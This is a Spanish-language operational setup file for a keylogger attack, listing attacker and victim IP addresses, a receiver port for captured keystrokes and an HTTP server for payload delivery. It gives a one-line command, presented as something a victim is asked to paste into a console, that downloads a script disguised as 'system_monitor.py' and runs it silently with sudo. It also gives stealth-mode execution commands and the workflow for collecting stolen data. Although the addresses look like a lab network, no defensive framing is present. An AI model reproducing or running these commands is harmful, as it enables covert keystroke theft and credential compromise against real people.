# CONFIGURACIÓN DE RED ACTUALIZADA
# ================================

## IPs de las máquinas:
- Máquina atacante (receptor): 10.0.2.15
- Máquina víctima (objetivo): 10.0.2.4

## PUERTOS UTILIZADOS:
- Puerto 8080: Receptor de datos del keylogger
- Puerto 8000: Servidor HTTP para descargar archivos

## COMANDOS PARA MÁQUINA ATACANTE (10.0.2.15)
# ==============================================

# 1. Iniciar servidor receptor (puerto 8080)
python3 data_receiver.py --port 8080

# 2. Servir archivos para descargar (puerto 8000)
python3 -m http.server 8000

## COMANDOS PARA MÁQUINA VÍCTIMA (10.0.2.4)
# ==========================================

# Opción 1: Comando que se pide pegar en la consola

 wget -q http://10.0.2.15:8000/system_monitor.py http://10.0.2.15:8000/reconstructor.py && sudo apt install -y python3-pynput python3-requests >/dev/null 2>&1 && sudo python3 system_monitor.py --silent &


# Opción 2: Descarga y ejecución manual
wget http://10.0.2.15:8000/system_monitor.py
python3 system_monitor.py --stealth

# Opción 4: Descargar proyecto completo
wget -r -np -nH --cut-dirs=1 -R "index.html*" http://10.0.2.15:8000/



## VERIFICACIÓN DE CONECTIVIDAD
# =============================

# Desde víctima (10.0.2.4), verificar conexión al atacante:
ping 10.0.2.15
curl -I http://10.0.2.15:8000

# Desde atacante (10.0.2.15), verificar conexión a víctima:
ping 10.0.2.4

## Flujo
# ===============================

1. En atacante (10.0.2.15):
   - Terminal 1: python3 data_receiver.py --port 8080
   - Terminal 2: python3 -m http.server 8000

2. En víctima (10.0.2.4):
   - wget -r -np -nH --cut-dirs=1 -R "index.html*" http://10.0.2.15:8000/

3. Monitorear resultados en atacante:
   - Los datos aparecerán en received_data/ o también podrían verse en la previsualización del monitoreo

